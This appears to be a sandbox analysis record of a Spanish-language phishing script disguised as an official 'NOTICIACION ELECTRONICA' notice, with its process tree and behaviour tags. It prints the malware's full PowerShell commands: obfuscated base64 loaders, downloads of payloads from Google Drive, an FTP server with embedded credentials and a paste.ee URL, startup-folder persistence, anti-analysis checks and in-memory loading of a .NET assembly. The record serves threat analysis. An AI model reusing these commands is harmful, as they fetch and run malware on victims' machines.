'yAGUAdA' + [char]66 + 'wAHkAcg' + [char]66 + 'jAHAAVQAvAHIAYgAuAG0Abw' + [char]66 + 'jAC4AdA' + [char]66 + 'hAHIAYg' + [char]66 + '2AGsAYw' + [char]66 + 'zAGUAZAAuAHAAdA' + [char]66 + 'mAEAAMQ' + [char]66 + '0AGEAcg' + [char]66 + 'iAHYAaw' + [char]66 + 'jAHMAZQ' + [char]66 + 'kAC8ALwA6AHAAdA' + [char]66 + 'mACcAKAAgAD0AIA' + [char]66 + '6AG4AYw' + [char]66 + 'xAG4AJAA7AH0AIAAKAA0AOw' + [char]66 + '0AGkAeA' + [char]66 + 'lACAAIAAgACAAIAAgAAoADQA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIA' + [char]66 + 'yAGUAdA' + [char]66 + '1AHAAbQ' + [char]66 + 'vAEMALQ' + [char]66 + '0AHIAYQ' + [char]66 + '0AHMAZQ' + [char]66 + 'SAAoADQAgAHsAZQ' + [char]66 + 'zAGwAZQAKAA0ACgANAH0ACgANACAAIAAgACAAIAAgACAACgANACAAewApAGwAbA' + [char]66 + '1AE4AJAAgAHEAZQAtACAAKQ' + [char]66 + 'lAHUAbg' + [char]66 + 'pAHQAbg' + [char]66 + 'vAEMAeQ' + [char]66 + 'sAHQAbg' + [char]66 + 'lAGwAaQ' + [char]66 + 'TACAAYQ' + [char]66 + 'lAC0AIAAnAGUAeg' + [char]66 + '5AGwAYQ' + [char]66 + 'uAGEAJwAsACcAUw' + [char]66 + 'OAEQAZQ' + [char]66 + '0AGEAcA' + [char]66 + 'hACcALAAnAGsAcg' + [char]66 + 'hAGgAcw' + [char]66 + 'lAHIAaQ' + [char]66 + 'XACcAIA' + [char]66 + 'zAHMAZQ' + [char]66 + 'jAG8Acg' + [char]66 + 'wAC0AdA' + [char]66 + 'lAGcAKAAoAGYAaQA7ACAAMgAxAHMAbA' + [char]66 + 'UADoAOg' + [char]66 + 'dAGUAcA' + [char]66 + '5AFQAbA' + [char]66 + 'vAGMAbw' + [char]66 + '0AG8Acg' + [char]66 + 'QAHkAdA' + [char]66 + 'pAHIAdQ' + [char]66 + 'jAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOwAgAH0AZQ' + [char]66 + '1AHIAdAAkAHsAIAA9ACAAaw' + [char]66 + 'jAGEAYg' + [char]66 + 'sAGwAYQ' + [char]66 + 'DAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'kAGkAbA' + [char]66 + 'hAFYAZQ' + [char]66 + '0AGEAYw' + [char]66 + 'pAGYAaQ' + [char]66 + '0AHIAZQ' + [char]66 + 'DAHIAZQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAewAgAGUAcw' + [char]66 + 'sAGUAfQAgAGYALwAgADAAIA' + [char]66 + '0AC8AIA' + [char]66 + 'yAC8AIA' + [char]66 + 'lAHgAZQAuAG4Adw' + [char]66 + 'vAGQAdA' + [char]66 + '1AGgAcwAgADsAJwAwADgAMQAgAHAAZQ' + [char]66 + 'lAGwAcwAnACAAZA' + [char]66 + 'uAGEAbQ' + [char]66 + 'tAG8AYwAtACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgACkAIAAnAHAAdQ' + [char]66 + '0AHIAYQ' + [char]66 + '0AFMAXA' + [char]66 + 'zAG0AYQ' + [char]66 + 'yAGcAbw' + [char]66 + 'yAFAAXA' + [char]66 + '1AG4AZQ' + [char]66 + 'NACAAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + '3AG8AZA' + [char]66 + 'uAGkAVw' + [char]66 + 'cAHQAZg' + [char]66 + 'vAHMAbw' + [char]66 + 'yAGMAaQ' + [char]66 + 'NAFwAZw' + [char]66 + 'uAGkAbQ' + [char]66 + 'hAG8AUg' + [char]66 + 'cAGEAdA' + [char]66 + 'hAEQAcA' + [char]66 + 'wAEEAXAAnACAAKwAgAFoAdw' + [char]66 + 'mAHcAVQAkACAAKAAgAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'uAGkAdA' + [char]66 + 'zAGUARAAtACAAJwAlAEkAaA' + [char]66 + 'xAFIAWAAlACcAIA' + [char]66 + 'tAGUAdA' + [char]66 + 'JAC0AeQ' + [char]66 + 'wAG8AQwAgADsAIA' + [char]66 + '0AHIAYQ' + [char]66 + '0AHMAZQ' + [char]66 + 'yAG8AbgAvACAAdA' + [char]66 + 'lAGkAdQ' + [char]66 + 'xAC8AIA' + [char]66 + 'YAEcAQw' + [char]66 + 'DAEoAIA' + [char]66 + 'lAHgAZQAuAGEAcw' + [char]66 + '1AHcAIA' + [char]66 + 'lAHgAZQAuAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAIAA7ACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAag' + [char]66 + 'NAE8Aeg' + [char]66 + 'IACQAKAAgAD0AIA' + [char]66 + 'YAEcAQw' + [char]66 + 'DAEoAOwApACAAZQ' + [char]66 + 'tAGEATg' + [char]66 + 'yAGUAcw' + [char]66 + 'VADoAOg' + [char]66 + 'dAHQAbg' + [char]66 + 'lAG0Abg' + [char]66 + 'vAHIAaQ' + [char]66 + '2AG4ARQ' + [char]66 + 'bACAAKwAgACcAXA' + [char]66 + 'zAHIAZQ' + [char]66 + 'zAFUAXAA6AEMAJwAoACAAPQAgAFoAdw' + [char]66 + 'mAHcAVQAkADsAKQAgACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAag' + [char]66 + 'NAE8Aeg' + [char]66 + 'IACQAKAAgACwAdg' + [char]66 + 'mAHEAbQ' + [char]66 + 'uACQAKA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHEAdw' + [char]66 + 'qAHYAegAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + 'xAHcAag' + [char]66 + '2AHoAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + 'xAHcAag' + [char]66 + '2AHoAJAA7AH0AOwAgACkAJw' + [char]66 + '3ADUAMA' + [char]66 + 'aADEAOA' + [char]66 + '1AGMANw' + [char]66 + 'aAE0ASwA4ADgAZw' + [char]66 + 'lAHQAaA' + [char]66 + 'qAG4AQQ' + [char]66 + 'wAGoAMQ' + [char]66 + 'MAEIALQA0AHkASA' + [char]66 + 'hAGEAMQAnACAAKwAgAHYAZg' + [char]66 + 'xAG0AbgAkACgAIAA9ACAAdg' + [char]66 + 'mAHEAbQ' + [char]66 + 'uACQAewAgAGUAcw' + [char]66 + 'sAGUAfQA7ACAAKQAnAFYARQ' + [char]66 + 'TAGQAag' + [char]66 + '3AFUAOQA1AFIALQ' + [char]66 + 'XAHMAWQ' + [char]66 + '1AFoATA' + [char]66 + 'pAHcAcg' + [char]66 + 'iADUAWQ' + [char]66 + 'OAFEALQ' + [char]66 + 'IAGoAcg' + [char]66 + 'iADIAcAAxACcAIAArACAAdg' + [char]66 + 'mAHEAbQ' + [char]66 + 'uACQAKAAgAD0AIA' + [char]66 + '2AGYAcQ' + [char]66 + 'tAG4AJA' + [char]66 + '7ACAAKQAgAGkAZg' + [char]66 + 'tAHUAWAAkACAAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcw' + [char]66 + 'uAGkAYQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC4ARQ' + [char]66 + 'SAFUAVA' + [char]66 + 'DAEUAVA' + [char]66 + 'JAEgAQw' + [char]66 + 'SAEEAXw' + [char]66 + 'SAE8AUw' + [char]66 + 'TAEUAQw' + [char]66 + 'PAFIAUAA6AHYAbg' + [char]66 + 'lACQAIAA9ACAAaQ' + [char]66 + 'mAG0AdQ' + [char]66 + 'YACQAOwAnAD0AZA' + [char]66 + 'pACYAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'kAD0AdA' + [char]66 + 'yAG8AcA' + [char]66 + '4AGUAPw' + [char]66 + 'jAHUALw' + [char]66 + 'tAG8AYwAuAGUAbA' + [char]66 + 'nAG8Abw' + [char]66 + 'nAC4AZQ' + [char]66 + '2AGkAcg' + [char]66 + 'kAC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACAAPQAgAHYAZg' + [char]66 + 'xAG0AbgAkADsAKQAgACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAGoATQ' + [char]66 + 'PAHoASAAkACAAKAAgAGwAZQ' + [char]66 + 'kADsAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'qAE0ATw' + [char]66 + '6AEgAJA' + [char]66 + '7ACAAKQAgAEMAZQ' + [char]66 + 'PAEkAYwAkACAAKAAgAGYAaQA7ACAAKQAyACgAcw' + [char]66 + 'sAGEAdQ' + [char]66 + 'xAEUALg' + [char]66 + 'yAG8Aag' + [char]66 + 'hAE0ALg' + [char]66 + 'uAG8AaQ' + [char]66 + 'zAHIAZQ' + [char]66 + 'WAC4AdA' + [char]66 + 'zAG8AaAAkACAAPQAgAEMAZQ' + [char]66 + 'PAEkAYwAkACAAOwA=';$nymcr = $nymcr.replace('уЦϚ' , 'B') ;;$cpdfb = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $nymcr ) ); $cpdfb = $cpdfb[-1..-$cpdfb.Length] -join '';$cpdfb = $cpdfb.replace('%XRqhI%','C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF');powershell $cpdfb
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2736
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $cIOeC = $host.Version.Major.Equals(2) ;if ( $cIOeC ) {$HzOMj = [System.IO.Path]::GetTempPath();del ( $HzOMj + '\Upwin.msu' );$nmqfv = 'https://drive.google.com/uc?export=download&id=';$Xumfi = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $Xumfi ) {$nmqfv = ($nmqfv + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$nmqfv = ($nmqfv + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$zvjwq = (New-Object Net.WebClient);$zvjwq.Encoding = [System.Text.Encoding]::UTF8;$zvjwq.DownloadFile($nmqfv, ($HzOMj + '\Upwin.msu') );$UwfwZ = ('C:\Users\' + [Environment]::UserName );JCCGX = ($HzOMj + '\Upwin.msu'); powershell.exe wusa.exe JCCGX /quiet /norestart ; Copy-Item 'C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF' -Destination ( $UwfwZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };$nqcnz = ('ftp://[email protected]/Upcrypter' + '/01/DLL01.txt' );$JukpV = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$LQQAB = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($LQQAB, $lllGq) ;$RVUXv = $webClient.DownloadString( $nqcnz ) ;$RVUXv | Out-File -FilePath $JukpV -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $JukpV ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$aeDwU = '$sNwoM = ''C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF'' ; $ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$aeDwU += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''↓:↓'',''A'') ) ;' ;$aeDwU += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$aeDwU += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$aeDwU += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''0/zpfHt/d/ee.etsap//:sptth'' , $sNwoM , ''DDDMSBuild'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$aeDwU | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};"
        5⤵
        Drops startup file
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1916
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe JCCGX /quiet /norestart
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2960
        
        C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" JCCGX /quiet /norestart
        7⤵
        Drops file in Windows directory
        
        PID:2588
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1608
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF"
    3⤵
    - Blocklisted process makes network request
    PID:1628
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $nymcr = 'Ow' + [char]66 + '9ADsAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGUAbA' + [char]66 + 'pAEYALQAgAHMAcw' + [char]66 + 'hAHAAeQ' + [char]66 + 'CACAAeQ' + [char]66 + 'jAGkAbA' + [char]66 + 'vAFAAbg' + [char]66 + 'vAGkAdA' + [char]66 + '1AGMAZQ' + [char]66 + '4AEUALQAgAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAFUAdw' + [char]66 + 'EAGUAYQAkADsAIAApACAAJwAxAHMAcAAuADMAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAHoAVw' + [char]66 + 'XAEIAVgAkADsAJwA7ACkAIAApACAAIAAnACcAZA' + [char]66 + 'sAGkAdQ' + [char]66 + 'CAFMATQ' + [char]66 + 'EAEQARAAnACcAIAAgACwAIA' + [char]66 + 'NAG8Adw' + [char]66 + 'OAHMAJAAgACwAIAAnACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAHAAYQ' + [char]66 + 'zAHQAZQAuAGUAZQAvAGQALw' + [char]66 + '0AEgAZg' + [char]66 + 'wAHoALwAwACcAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJwAnAEkAVg' + [char]66 + 'GAHIAcAAnACcAIAAoAGQAbw' + [char]66 + 'oAHQAZQAnACAAPQArACAAVQ' + [char]66 + '3AEQAZQ' + [char]66 + 'hACQAOwAgACcATQ' + [char]66 + '0AGUARwAuACkAIAAnACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAJwAgACgAZQ' + [char]66 + 'wAHkAVA' + [char]66 + '0AGUARwAnACAAPQArACAAVQ' + [char]66 + '3AEQAZQ' + [char]66 + 'hACQAOwAgACcALgApACAAeg' + [char]66 + 'kAGYAeQ' + [char]66 + 'GACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAJwAgACsAIAAnADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAJwAgAD0AKwAgAFUAdw' + [char]66 + 'EAGUAYQAkADsAIAAnADsAIAApACAAKQAnACcAQQAnACcALAAnACcAkyE6AJMhJwAnACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAcgAuAEcAZQ' + [char]66 + 'hAHkAcgAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwA0ADYAZQ' + [char]66 + 'zAGEAQg' + [char]66 + 'tAG8Acg' + [char]66 + 'GADoAOg' + [char]66 + 'dAHQAcg' + [char]66 + 'lAHYAbg' + [char]66 + 'vAEMALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAcw' + [char]66 + 'bACAAPQAgAHoAZA' + [char]66 + 'mAHkARgAkACAAXQ' + [char]66 + 'dAFsAZQ' + [char]66 + '0AHkAQg' + [char]66 + 'bACcAIAA9ACsAIA' + [char]66 + 'VAHcARA' + [char]66 + 'lAGEAJAA7ACAAJwA7ACkAOA' + [char]66 + 'GAFQAVQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAtACAAJwAgACsAIA' + [char]66 + 'sAEcAZg' + [char]66 + 'UAFMAJAAgACsAIAAnACAAaA' + [char]66 + '0AGEAUAAtACAAdA' + [char]66 + 'uAGUAdA' + [char]66 + 'uAG8AQwAtAHQAZQ' + [char]66 + 'HACgAIAA9ACAARw' + [char]66 + 'lAGEAeQ' + [char]66 + 'yACQAIAA7ACAAJwAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAnACAAPQAgAE0Abw' + [char]66 + '3AE4AcwAkACcAIAAgAD0AIA' + [char]66 + 'VAHcARA' + [char]66 + 'lAGEAJAA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIA' + [char]66 + 'sAEcAZg' + [char]66 + 'UAFMAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAHoASA' + [char]66 + 'sAFQAdQAkADsAIAApACAAQQ' + [char]66 + 'VAHoASA' + [char]66 + 'EACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAE4AbA' + [char]66 + 'yAGgAUAAkACAAPQAgAHoASA' + [char]66 + 'sAFQAdQAkADsAIAApACAAVg' + [char]66 + 'wAGsAdQ' + [char]66 + 'KACQAIA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC0AIA' + [char]66 + '0AG4AZQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC0AdA' + [char]66 + 'lAEcAIAAoACAAPQAgACAAQQ' + [char]66 + 'VAHoASA' + [char]66 + 'EACQAOwAgADgARg' + [char]66 + 'UAFUAOgA6AF0AZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AdA' + [char]66 + '4AGUAVAAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4ATg' + [char]66 + 'sAHIAaA' + [char]66 + 'QACQAOwAgAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + 'XAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUwAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AIAA9ACAATg' + [char]66 + 'sAHIAaA' + [char]66 + 'QACQAOwAgACkAJw' + [char]66 + '0AHgAdAAuADIAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAGwARw' + [char]66 + 'mAFQAUwAkADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgACcAOA' + [char]66 + 'GAFQAVQAnACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC0AIA' + [char]66 + 'WAHAAaw' + [char]66 + '1AEoAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAHYAWA' + [char]66 + 'VAFYAUgAkADsAIAApACAAeg' + [char]66 + 'uAGMAcQ' + [char]66 + 'uACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + '3ACQAIAA9ACAAdg' + [char]66 + 'YAFUAVg' + [char]66 + 'SACQAOwAgACkAcQ' + [char]66 + 'HAGwAbA' + [char]66 + 'sACQAIAAsAEIAQQ' + [char]66 + 'RAFEATAAkACgAbA' + [char]66 + 'hAGkAdA' + [char]66 + 'uAGUAZA' + [char]66 + 'lAHIAQw' + [char]66 + 'rAHIAbw' + [char]66 + '3AHQAZQ' + [char]66 + 'OAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUwAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAC0Adw' + [char]66 + 'lAG4AIAA9ACAAcw' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 'kAGUAcg' + [char]66 + 'DAC4AdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAHcAJAA7ACAAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAgAD0AIA' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAdwAkADsAIAApACkAIAA0ADYAIAAsADQANgAgACwANAA2ACAALAA0ADYAIAAsADQANgAgACwANAA2ACAALAA2ADUAIAAsADUANQAgACwAMwA1ACAALAA5ADQAIAAsADkAOAAgACwAMAAwADEAIAAsADcAMQAxACAALAA5ADgAIAAsADIAMAAxACgAXQ' + [char]66 + 'dAFsAcg' + [char]66 + 'hAGgAYw' + [char]66 + 'bACAAbg' + [char]66 + 'pAG8AagAtACgAIAA9ACAAcQ' + [char]66 + 'HAGwAbA' + [char]66 + 'sACQAOwAgACkAKQA5ADQALAA2ADEAMQAsADcAOQAsADQAMQAxACwAOAA5ACwAOAAxADEALAA3ADAAMQAsADkAOQAsADUAMQAxACwAMQAwADEALAAwADAAMQAoAF0AXQ' + [char]66 + 'bAHIAYQ' + [char]66 + 'oAGMAWwAgAG4AaQ' + [char]66 + 'vAGoALQAoACAAPQAgAEIAQQ' + [char]66 + 'RAFEATAAkADsAKQAnAHQAeA' + [char]66 + '0AC4AMQAwAGwAbA' + [char]66 + 'kACcAIAArACAAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgACgAIAA9ACAAVg' + [char]66 + 'wAGsAdQ' + [char]66 + 'KACQAOwApACAAJw' + [char]66 + '0AHgAdAAuADEAMA' + [char]66 + 'MAEwARAAvADEAMAAvACcAIAArACAAJw' + [char]66 + 'yAGUAdA' + [char]66 + 'wAHkAcg' + [char]66 + 'jAHAAVQAvAHIAYgAuAG0Abw' + [char]66 + 'jAC4AdA' + [char]66 + 'hAHIAYg' + [char]66 + '2AGsAYw' + [char]66 + 'zAGUAZAAuAHAAdA' + [char]66 + 'mAEAAMQ' + [char]66 + '0AGEAcg' + [char]66 + 'iAHYAaw' + [char]66 + 'jAHMAZQ' + [char]66 + 'kAC8ALwA6AHAAdA' + [char]66 + 'mACcAKAAgAD0AIA' + [char]66 + '6AG4AYw' + [char]66 + 'xAG4AJAA7AH0AIAAKAA0AOw' + [char]66 + '0AGkAeA' + [char]66 + 'lACAAIAAgACAAIAAgAAoADQA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIA' + [char]66 + 'yAGUAdA' + [char]66 + '1AHAAbQ' + [char]66 + 'vAEMALQ' + [char]66 + '0AHIAYQ' + [char]66 + '0AHMAZQ' + [char]66 + 'SAAoADQAgAHsAZQ' + [char]66 + 'zAGwAZQAKAA0ACgANAH0ACgANACAAIAAgACAAIAAgACAACgANACAAewApAGwAbA' + [char]66 + '1AE4AJAAgAHEAZQAtACAAKQ' + [char]66 + 'lAHUAbg' + [char]66 + 'pAHQAbg' + [char]66 + 'vAEMAeQ' + [char]66 + 'sAHQAbg' + [char]66 + 'lAGwAaQ' + [char]66 + 'TACAAYQ' + [char]66 + 'lAC0AIAAnAGUAeg' + [char]66 + '5AGwAYQ' + [char]66 + 'uAGEAJwAsACcAUw' + [char]66 + 'OAEQAZQ' + [char]66 + '0AGEAcA' + [char]66 + 'hACcALAAnAGsAcg' + 